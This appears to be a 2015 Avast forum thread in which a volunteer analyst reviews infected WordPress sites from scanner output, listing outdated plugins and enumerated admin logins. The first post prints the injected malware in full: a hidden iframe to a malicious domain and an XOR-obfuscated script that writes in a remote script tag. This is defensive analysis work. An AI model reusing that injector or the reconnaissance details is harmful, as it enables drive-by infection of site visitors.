Author Topic: Site with elevated exposure or only blacklisted?  (Read 3826 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Site with elevated exposure or only blacklisted?
« on: October 09, 2015, 11:35:11 PM »
See: https://app.webinspector.com/public/reports/42166582?cache=true
See: https://sitecheck.sucuri.net/results/www.enginshoes.com
Hidden Iframes. Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202?v04
<iframe src="htxp://googletraids.ml/46cx" width="1" height="1" frameborder="0">
*Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v282.2
    <script>var a="'02'02'02'02'1Aqapkrv'1G'2C'02'02'02'02'02'02'02'02dwlavkml'02qvpkleEgl'0:ngl'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02vgzv'02'1F'02'00'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02tcp'02ajcpqgv'02'1F'02'00c`afgdejkhinolmrspqvwtuz{x23016745:;'00'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02dmp'0:'02tcp'02k'1F2'1@'02k'02'1A'02ngl'1@'02k))'02'0;'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02vgzv'02)'1F'02ajcpqgv,ajcpCv'0:Ocvj,dnmmp'0:Ocvj,pclfmo'0:'0;'02('02ajcpqgv,nglevj'0;'0;'1@'2C'02'02'02'02'02'02'02'02'02'02'02'02pgvwpl'02vgzv'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'02'02'02'02qgvVkogmwv'0:32'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02qg]pgdgppgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:uklfmu,nmacvkml,jmqv'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02`cqg'02'1F'02'00k,knnwoklcvkmlgq,amo-hqlkvaj'00'1@'2C'02'02'02'02'02'02'02'02tcp'02wwkf'02'1F'02qvpkleEgl'0:7'0;'1@'2C'02'02'02'02'02'02'02'02tcp'02l]wpn'02'1F'02'00jvvr'1C--'00'02)'02wwkf'02)'02'00,'00'02)'02`cqg'02)'02'00'1Dfgdcwnv]ig{umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'2C'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'02'00'04qg]pgdgppgp'1F'00'02)'02qg]pgdgppgp'02)'02'00'04qmwpag'1F'00'02)'02jmqv'1@'2C'02'02'02'02'02'02'02'02kd'02'0:fgdcwnv]ig{umpf'02'03'1F'1F'02lwnn'02'04'04'02fgdcwnv]ig{umpf'02'03'1F'1F'02'05'05'02'04'04'02qg]pgdgppgp'02'03'1F'1F'02lwnn'02'04'04'02qg]pgdgppgp'02'03'1F'1F'02'05'05'0;'5@'2C'02'02'02'02'02'02'02'02'02'02'02'02fmawoglv,upkvg'0:'05'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'02qpa'1F'00'05'02)'02l]wpn'02)'02'05'00'1G'05'02)'02'05'1A'05'02)'02'05-qapkrv'1G'05'0;'1@'2C'02'02'02'02'02'02'02'02'5F'2C'02'02'02'02'1A-qapkrv'1G";b="";c="";var clen;clen=a.length;for(i=0;i<clen;i++){b+=String.fromCharCode(a.charCodeAt(i)^2)}c=unescape(b);document.write(c);</script> redirect response error = IFrameinject.AE

Web application version:
WordPress version: WordPress 3.8.1
Wordpress Version 3.8.0 based on: -http://www.enginshoes.com/wp-admin/js/common.js
RevSlider version: 4.1.1
WordPress theme: -http://www.enginshoes.com/wp-content/themes/room09/
Wordpress internal path: /home/enginshoes.com/httpdocs/wp-content/themes/room09/index.php
WordPress version outdated: Upgrade required.
RevSlider Plugin outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.2
Outdated RevSlider Found. Serious risk: Under 4.1.4

WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

woocommerce 2.1.6   latest release (2.4.7) Update required
http://www.woothemes.com/woocommerce/
revslider   
yith-woocommerce-wishlist   latest release (2.0.11)
http://yithemes.com/themes/plugins/yith-woocommerce-wishlist/
yith-woocommerce-compare   latest release (2.0.4)
https://yithemes.com/
nextend-facebook-connect 1.4.59   latest release (1.5.7) Update required
http://nextendweb.com/
yith-woocommerce-ajax-navigation   latest release (2.4.0)
http://yithemes.com/

WordPress Theme
The theme has been found by examining the path /wp-content/themes/ *theme name* /

 Room09 1.6.2http://demo.yithemes.com/room09/

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   None   murat
2      None

polonus (volunteer website security analyst and website error-hunter)
« Last Edit: October 09, 2015, 11:41:57 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Site with elevated exposure or only blacklisted?
« Reply #1 on: October 09, 2015, 11:59:35 PM »
There are two causes for this:
Quote
One, is that your webserver (probably Apache) has write access to the core files. This happens a lot in shared hosting, where the Apache process runs as your user login. In general, this is a bad thing. . Normally, you just want to give Apache write access to sites/default/files and your private and tmp directories (wherever they are defined).

Two, is that your hosting provider or your server is probably running an outdated version of PHP. Again, this tends to happen a lot with shared hosts (many are reluctant to keep up with latest security versions). Many outdated versions of PHP have security vulnerabilities in them, which lets attackers construct bad URLs and write to files on the filesystem. Adding code to template files is low hanging fruit that a lot of people don't notice.
Quote info credits go to:  mpdonadio on Drupal groups.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Site with elevated exposure or only blacklisted?
« Reply #2 on: October 12, 2015, 07:08:42 PM »
Update: https://www.virustotal.com/nl/url/24454096f28cc27c88f19301f84fdd8ac140f6ae2ae34b4b1969160cea9a77bb/analysis/1444668729/
plugins/system/rokbox/rokbox.js
Severity:   Potentially Suspicious
Reason:   Detected potentially suspicious content.
Details:   Detected potentially suspicious initialization of function pointer to JavaScript method write <code> __tmpvar1530976633 = write; <code/>
Threat dump:   See: https://sitecheck.sucuri.net/results/www.mmasport.it
Threat dump MD5:   A5EE45F9A5AD8053DA56CAB26EF21FC5
File size[byte]:   20280
File type:   ASCII
Page/File MD5:   2089714D3A3033069E28360505C233B4
Scan duration[sec]:   1.227000

Also see: https://forum.avast.com/index.php?topic=176205.0

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Site with elevated exposure or only blacklisted?
« Reply #3 on: October 15, 2015, 03:04:47 PM »
See: http://urlquery.net/report.php?id=1444913118917
Bitdefender TrafficLight flags.
Seems this malware is back (or has it ever been away?) -> Known javascript malware. Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v282.2
WordPress Version
4.0.8
Version does not appear to be latest 4.3.1 - update now.

WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

custom-contact-forms 5.1.0.5   latest release (6.9.0) Update required
http://www.taylorlovett.com
vipers-video-quicktags   latest release (6.5.2)
http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/

WordPress Theme
The theme has been found by examining the path /wp-content/themes/ *theme name* /

 Twenty Twelve 1.7https://wordpress.org/themes/twentytwelve/

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.

ID   User   Login
1   None   admin
2   None   gerard
It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring. As this will reduce the chance of automated password attackers gaining access. However it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

On PHP version: https://forums.cpanel.net/threads/is-it-already-dangerous-keeping-php-5-2-17-on-production.267442/

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!